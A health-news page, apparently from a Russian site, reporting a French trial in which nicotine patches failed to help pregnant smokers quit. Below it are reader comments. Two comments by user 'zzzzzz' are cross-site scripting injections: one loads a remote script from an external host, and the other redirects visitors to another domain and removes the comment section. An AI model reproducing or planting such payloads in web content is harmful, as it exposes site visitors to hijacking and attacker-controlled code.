Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ужас и обман! Никотиновые...  >>  Ужас и обман! Никотиновые пластыри не помогут бросить курить!
 
Обратная связь
 

Ужас и обман! Никотиновые пластыри не помогут бросить курить!

Размер шрифта
15 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Казалось бы, медицина подарила нам простой и действенный способ бросить курить – никотиновые пластыри. Однако не все так хорошо, как кажется. Согласно новому исследованию, опубликованному в журнале BMJ, никотиновые пластыри никак не  помогают беременным курильщицам завязать со своей вредной привычкой.

Ужас и обман! Никотиновые пластыри не помогут бросить курить!

В исследование было включено 402 беременных женщины из Франции, которые выкуривали по пять и более сигарет в день. Женщины, находившиеся на 12-20 неделе беременности, были разделены случайным образом на две группы: одна получала 16-часовые никотиновые пластыри, а другая – неактивные пластыри с плацебо, то есть пустышку, и так вплоть до рождения ребенка.

Участницы эксперимента также получали психологическую помощь, чтобы помочь им бросить курить, и каждый месяц проходили осмотры. По данным ученых, только 5,5% женщин в группе никотиновых пластырей и 5,1% из группы плацебо смогли полностью бросить курить.

Исследователи также обнаружили, что женщины в группе никотиновых пластырей имели значительно более высокий уровень артериального давления, чем участницы группы плацебо. Это говорит о том, что все дальнейшие исследования, которые будут направлены на изучения заместительной терапии никотином у беременных курильщиц, должны учитывать показатели артериального давления.

«Полученные нами результаты очень разочаровывают, и они должны лишь стимулировать усилия по поиску и исследованию новых способов бросить курить, связанных и не связанных с приемом лекарств», – к такому выводу пришли доктор Иван Берлин с коллегами из Парижа. – «В отсутствие доказанных лекарственных методик, психологическая поддержка остается основным методом помощи беременным женщинам, которые хотят бросить курить».

«Психологическое консультирование было отложено на две недели с начала исследования, и это может объяснить, почему в обеих группах женщин уровень успешного отказа от курения был так низок», – добавляет Леони Броуз из Королевского колледжа в Лондоне.

«Сейчас еще слишком рано полностью отказываться от возможности использования заместительной терапии никотином», – говорит Леони. – «Однако нужны крупные новые исследования, чтобы найти, разработать и изучить новые, более эффективные способы лечения курящих беременных женщин, которые не в состоянии бросить».

Несмотря на то, что ученые всего мира активно разрабатывают новые методики для помощи в избавлении от этой вредной привычки, проблема отказа от курения все еще остается очень сложной и не имеет эффективного решения. Относитесь к своему здоровью бережно и постарайтесь даже не начинать курить, чтобы потом не пришлось бросать.

Читайте о проблемах курения и о том, как же бросить курить в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

15 сентября 2014 в 09:23

Цитировать   |   Пожаловаться

Не знаю кому как. На мой взгляд не бросают курить по 3 причинам, из которых никотин, меньшее зло. За 10 лет курения, с дозой от пачки в день, правда лёгких, главная проблема была в ритуале. Чем себя занять. Смотрел дома фильм и на половине ставил на паузу, шёл на балкон щёлкать семечки. Длилось подобное почти пол года. Каждые 30-60 минут входил. А с никотином всё проще. Послушал книгу Алана Кара. Главная почерпнутая идея была, что курить в во волю не хватит, ни денег, ни здоровья. А ограничивать себя лучше 3 недели с постепенным снижением тяги, чем по пол часа 20 раз в день. С 1-го раза не выдержал купил пачку и скурил почти без перерыва. Идея в том, что удовольствие от курения как от тесных ботинок, снял и кайфуешь. На сроке от суток, чем дольше ты не курил, тем меньше тяга, а значит и кайф от её снятия, сильнее чувствуется вонь, тошнота, головокружение. А вот тяга к следующей сигарете будет как изначальная, и бросать ты будешь с начала, поэтому так тяжело бросить постепенно. Помогло, что я хорошо запомнил вкус последней пачки. Не было желания через месяц, год, ... наградить себя такой сигаретой за терпение, а многие так срываются. А пластырь тоже самое, как заходить в холодную воду, медленно по милиметру ощущая как тебя обжигает холодной водой. Шансов, бросить пластырь или электронную сигарету гораздо больше, чем бросить от них курить.

2 - zzzzzz

30 июня 2015 в 18:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:29

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Хотите бросить курить или заставить мужа бросить? Больше секса!   Кальян вызывает рак! Можно ли курить дальше?   Курение во время беременности сделает вашего ребенка шизофреником   Бегом на улицу! Солнце понижает давление!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как бросить курить
Как сохранить мозги в 30 лет
Нежданно-негаданно! Почему болит голова?!

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.